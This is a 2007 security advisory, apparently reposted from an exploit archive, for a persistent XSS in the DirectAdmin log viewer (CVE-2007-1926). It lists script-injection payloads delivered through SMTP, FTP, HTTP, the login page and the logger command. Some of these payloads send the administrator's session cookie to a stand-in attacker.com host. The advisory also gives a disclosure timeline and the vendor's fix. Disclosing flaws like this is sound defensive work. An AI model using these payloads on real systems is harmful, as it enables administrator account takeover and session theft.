DirectAdmin persistant XSS [takeover an Administrator`s account]

2007.04.11
Credit: Kanedaaa Bohater
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-1926
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+ Subject: DirectAdmin persistant XSS [takeover an Administrator`s account] + Version: < DirectAdmin 1.29.3 + Discovered by: Kanedaaa: http://kaneda.bohater.net + DirectAdmin Description: DirectAdmin is a popular, advanced Web Control Panel with many features for webhosting. www.directadmin.com + Persistant XSS Description: It is possible to take over an Administrator`s account by injecting persistent XSS data to the System Logs [/var/log/*]. When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press "Show log" to display logs - he can be a victim of XSS attack and his session can be easily taken over - which means that it is possible to run any command with DirectAdmin's Administrator priviliges. I found out that 7 from 15 log files in the menu, could be used as means of injecting XSS to a system with no login credentials required. Next 3 of them are possible to be injected when you are logged as a valid user in the DirectAdmin. I was testing DirectAdmin on default Debian 4.0 installation but in general it should be working for other platforms too (with small changes I guess). Details: I) Examples of an attack without login credentials: 1) Log file: /var/log/exim/rejectlog, /var/log/exim/mainlog Data is sent to IP with DirectAdmin to port 25: vrfy </textarea><script>alert('0wned:'+escape(document.cookie));</script> Lines in log files: mainlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script> rejectlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script> 2) Log file: /var/log/proftpd/auth.log Data is sent to IP with DirectAdmin to port 21: user </textarea><script>alert('0wned:'+escape(document.cookie));</script> Lines in log files: auth.log:ProFTPd [28114] 123.123.123.123 [23/Mar/2007:19:29:26 +0100] "USER </textarea><script>alert('0wned:'+escape(document.cookie));</script>" 331 3) Log file: /var/log/httpd/error_log Data is sent to IP with DirectAdmin to port 80: GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script> Lines in log files: error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123] request failed: erroneous characters after protocol string: GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script> 4) Log file: /var/log/httpd/access_Log Data is sent to "free (not attached to any user)" IP to port 80 (using wget): wget IP --user-agent="</textarea><script>alert('0wned:'+escape(document.cookie)) ;</script>" Lines in log files: access_log:123.123.123.123 - - [23/Mar/2007:19:36:46 +0100] "GET / HTTP/1.0" 200 2673 "-" "</textarea><script>alert('0wned:'+escape(document.cookie));</script>" 5) Log file: /var/log/directadmin/error.log Data is sent to first DirectAdmin login page: login: </textarea><script>alert('0wned:'+escape(document.cookie));</script> password: any (not empty) Lines in log files: error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info for </textarea><script>alert('0wned:'+escape(document.cookie));</script> 6) Log file: /var/log/directadmin/security.log Data is sent to first DirectAdmin login page: login: </textarea><script>alert('0wned:'+escape(document.cookie));</script> Lines in log files: security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login with an invalid username: '</textarea><script>alert('0wned:'+escape(document.cookie));</script>' *** II) Examples of an attack with login credentials: 1) Log file: /var/log/directadmin/security.log Via WWW: http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.c om</textarea><script>alert('XSS');</script> Via ftp login: lftp login@directadmin:/> get "</textarea><script>location.href='http://attacker.com/xss.php?cook='+es cape(document.cookie)</script>" 2) Log file: /var/log/messages via php: <?php system('/usr/bin/logger "</textarea><script>location.href='http://attacker.com/xss.php?cook='+ escape(document.cookie)</script>"'); ?> 3) Log file: /var/log/messages via ssh: /usr/bin/logger "</textarea><script>location.href='http://attacker.com/xss.php?cook='+es cape(document.cookie)</script>" Timeline: 2007.02.25 bug discovered 2007.03.00 bug tested 2007.03.23 bug sent via Technical Support mail from http://www.directadmin.com/support.html 2007.03.24 fast response after few hours from DirectAdmin : Thanks for the report. Fix will be out within a few hours with DA 1.29.3 2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for log viewer, Description: Ensure all charcters are html encoded when viewing logs through the log viewer. Original Advisory: http://kaneda.bohater.net/security/20070323-directadmin_persistant_xss_t akeover_administrator_account.php -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] .. [+] You can take our lives,but you will never take our Freedom - W.Wallace [+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama [+] Revolution the only solution - System of a down... [+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0 [-] Kanedaaa... Bohateur... Cucumber Team Member... kaneda (at) bohater (dot) net [email concealed]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top